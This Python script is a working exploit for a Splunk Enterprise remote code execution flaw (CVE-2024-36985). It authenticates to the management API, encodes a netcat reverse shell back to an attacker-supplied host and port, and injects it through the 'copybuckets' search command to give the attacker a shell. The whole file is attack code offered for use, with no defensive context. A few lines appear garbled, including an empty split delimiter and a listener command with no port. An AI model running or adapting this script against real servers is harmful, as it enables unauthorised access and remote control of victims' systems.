#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ==============================================================================
# Exploit for Splunk Enterprise RCE (copybuckets.py) - CVE-2024-36985
#
# This script automates the exploitation by using the 'copybuckets' custom
# search command, which is the most direct and accurate attack vector.
# ==============================================================================
import requests
import base64
import json
import argparse
import sys
import urllib3
# Suppress InsecureRequestWarning for self-signed certificates
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def print_banner():
"""Prints a cool banner."""
print("="*60)
print(" CVE-2024-36985 - Splunk 'copybuckets' Custom Command RCE Exploit")
print("="*60)
def get_session_key(host, mgmt_port, username, password, use_ssl=True):
"""Authenticates to Splunk and retrieves a session key."""
protocol = "https" if use_ssl else "http"
login_url = f"{protocol}://{host}:{mgmt_port}/services/auth/login"
print(f"[*] Authenticating to {login_url} as '{username}'...")
try:
r = requests.post(login_url, data={'username': username, 'password': password}, verify=False, timeout=15)
if r.status_code != 200:
print(f"[!] Error: Authentication failed. Status code: {r.status_code}")
print(f"[!] HINT: The API endpoint was not found. Are you using the correct management port (default 8089)?")
return None
session_key = r.text.split('')[1].split('')[0]
print("[+] Successfully obtained session key!")
return session_key
except requests.exceptions.RequestException as e:
print(f"[!] Error: Connection to Splunk failed: {e}")
return None
def construct_final_payload(lhost, lport):
"""Constructs the final, proven-to-work JSON payload string."""
# Please change your payload here.
reverse_shell_cmd = f"busybox nc {lhost} {lport} -e /bin/bash"
print(f"[*] Reverse shell command: {reverse_shell_cmd}")
b64_payload = base64.b64encode(reverse_shell_cmd.encode()).decode()
print(f"[*] Base64 encoded payload: {b64_payload}")
decode_and_exec_cmd = f"{{echo,{b64_payload}}}|{{base64,-d}}|{{bash,-i}}"
print(f"[*] On-target decode command: {decode_and_exec_cmd}")
json_dict = {
"providers": {
"pwn_provider": {
"command.arg.0": "/opt/splunk/etc/apps/splunk_archiver/java-bin/jars/sudobash",
"command.arg.1": "-c",
"command.arg.2": decode_and_exec_cmd
}
},
"vixes": {
"pwn_vix": {
"provider": "pwn_provider"
}
}
}
# Return the raw JSON string. The trigger function will handle formatting.
json_string = json.dumps(json_dict)
print("[+] Final JSON payload constructed successfully.")
return json_string
def trigger_exploit(host, mgmt_port, use_ssl, session_key, json_payload):
"""Executes the exploit by running the custom search command via the REST API."""
# --- SPL Query Construction ---
# We need to escape the double quotes inside the JSON payload string
# to embed it within the 'data="..."' part of the SPL query.
spl_escaped_json = json_payload.replace('"', '\\"')
# This is the final, simple SPL query based on your discovery.
spl_query = f'| copybuckets data="{spl_escaped_json}"'
print(f"[*] Constructed malicious SPL query: {spl_query}")
# --- API Call Setup ---
protocol = "https" if use_ssl else "http"
search_url = f"{protocol}://{host}:{mgmt_port}/services/search/jobs"
headers = {
'Authorization': f'Splunk {session_key}'
}
data = {
'search': spl_query,
'exec_mode': 'oneshot',
# We must specify the app context where the custom command is defined.
'app': 'splunk_archiver'
}
print("[-] Triggering exploit by creating a remote search job...")
print(f"[*] Make sure your listener is running on your local machine (e.g., nc -lvnp )")
try:
r = requests.post(search_url, headers=headers, data=data, verify=False, timeout=20)
if r.status_code == 201 or r.status_code == 200: # 201 Created for normal jobs, 200 for oneshot
print("[+] Exploit command sent successfully via search API. Check your listener for a shell!")
else:
print(f"[!] Error: Failed to create the search job. Status code: {r.status_code}")
print(f"[!] Response: {r.text}")
except requests.exceptions.RequestException as e:
print(f"[!] An error occurred while sending the search job: {e}")
if __name__ == "__main__":
print_banner()
parser = argparse.ArgumentParser(description="Exploit for Splunk Enterprise RCE (CVE-2024-36985)")
parser.add_argument("-t", "--target", required=True, help="Splunk host (e.g., 192.168.1.100)")
parser.add_argument("-u", "--user", required=True, help="Splunk username")
parser.add_argument("-P", "--password", required=True, help="Splunk password")
parser.add_argument("--lhost", required=True, help="Your local IP address for the reverse shell")
parser.add_argument("--lport", required=True, type=int, help="Your local port for the reverse shell")
parser.add_argument("--mgmt-port", default=8089, type=int, help="Splunk management port for API calls (default: 8089)")
parser.add_argument("--no-ssl", action="store_true", help="Use HTTP instead of HTTPS for the management connection")
args = parser.parse_args()
use_ssl = not args.no_ssl
session_key = get_session_key(args.target, args.mgmt_port, args.user, args.password, use_ssl)
if not session_key:
sys.exit(1)
payload = construct_final_payload(args.lhost, args.lport)
trigger_exploit(args.target, args.mgmt_port, use_ssl, session_key, payload)